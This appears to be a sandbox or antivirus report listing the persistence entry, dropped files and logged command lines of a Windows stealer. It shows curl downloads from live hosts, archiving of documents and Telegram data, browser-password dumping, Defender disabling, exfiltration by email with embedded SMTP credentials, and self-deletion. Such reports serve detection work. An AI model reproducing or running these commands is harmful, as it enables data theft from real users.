Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'Video Configurations' = 'C:\Intel\go.exe'
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- C:\intel\ГЄГўГЁГІГ ГГ¶ГЁГї îá îïëà òå.doc
- C:\intel\curl.exe
- C:\intel\rezet.cmd
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- C:\intel\curl.exe
- 'C:\intel\curl.exe' -o C:\Intel\driver.exe http://detectis.ru/down/driver.exe
- 'C:\intel\curl.exe' -o C:\Intel\keys.rar http://hostingforme.nl//down/keys.rar
- 'C:\intel\curl.exe' -o C:\Intel\MPK.rar http://hostingforme.nl/down/MPK.rar
- 'C:\intel\curl.exe' -o C:\Intel\pas.rar http://hostingforme.nl/down/pas.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>C:\Intel\rezet.cmd cd C:\Intel\
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\docx-d.rar D:\*.docx /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOCX-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekc...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\docx-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\doc-e.rar E:\*.doc /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOC-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekcc...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\doc-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd ping -n 3600 127.0.0.1
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOCX-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekc...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\docx-e.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "%APPDATA%\Telegram Desktop\tdata" /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Telegram nyekcc/user" -body "Telegram nye...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\docx-e.rar E:\*.docx /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\tdata.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\curl.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\userprofile.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\Images.jpg
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\rezet.cmd
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\wbpv.exe /stext "C:\Intel\password.txt"
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\DefenderControl.exe /D
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar DefenderControl.exe C:\Intel\ /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\doc-d.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\doc-c.rar C:\*.doc /y
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Intel\rezet.cmd" "
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\blat.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\password.txt
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Password nyekcc/user" -body "Password nye...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\pas.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\wbpv.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\DefenderControl.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOC-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekcc...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\MPK.rar http://hostingforme.nl/down/MPK.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set smtp=mail.hostingforme.nl
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOC-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekcc...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set mail-in=pass@hostingforme.nl
- '%WINDIR%\syswow64\ping.exe' -n 3600 127.0.0.1
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\doc-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\pas.rar http://hostingforme.nl/down/pas.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\docx-c.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://detectis.ru/down/driver.exe
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\doc-d.rar D:\*.doc /y
- '%WINDIR%\syswow64\attrib.exe' +s +h C:\Intel
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\docx-c.rar C:\*.docx /y
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set mail-out=out@hostingforme.nl
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\keys.rar http://hostingforme.nl//down/keys.rar
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set pass-out=Outghj5698
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOCX-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyek...
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\blat.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Password nyekcc/user" -body "Password nye...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set mail-in=pass@hostingforme.nl' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\pas.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\password.txt' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\keys.rar http://hostingforme.nl//down/keys.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\DefenderControl.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\wbpv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set pass-out=Outghj5698' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\MPK.rar http://hostingforme.nl/down/MPK.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\userprofile.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://detectis.ru/down/driver.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\Images.jpg' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\rezet.cmd' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>C:\Intel\rezet.cmd cd C:\Intel\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set smtp=mail.hostingforme.nl' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\doc-d.rar D:\*.doc /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\pas.rar http://hostingforme.nl/down/pas.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\docx-e.rar E:\*.docx /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd ping -n 3600 127.0.0.1' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\docx-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\docx-e.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\doc-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOC-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekcc...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\docx-d.rar D:\*.docx /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOCX-D<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekc...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\docx-c.rar C:\*.docx /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\docx-d.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\doc-e.rar E:\*.doc /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\doc-c.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOC-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekcc...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Intel\rezet.cmd" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\wbpv.exe /stext "C:\Intel\password.txt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOC-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekcc...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -ep -hplimpid2903392 C:\Intel\doc-c.rar C:\*.doc /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "%APPDATA%\Telegram Desktop\tdata" /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Telegram nyekcc/user" -body "Telegram nye...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q C:\Intel\curl.exe' (with hidden window)
- '%WINDIR%\syswow64\attrib.exe' +s +h C:\Intel' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\tdata.rar' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar DefenderControl.exe C:\Intel\ /y' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\DefenderControl.exe /D' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOCX-C<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyek...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd C:\Intel\blat.exe -to %mail-in% -f "DOCX-E<%mail-out%>" -server %smtp% -port 587 -u %mail-out% -pw %pass-out% -subject "Document nyekcc/user" -body "Document nyekc...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd set mail-out=out@hostingforme.nl' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo>>C:\Intel\rezet.cmd del /q /f C:\Intel\doc-e.rar' (with hidden window)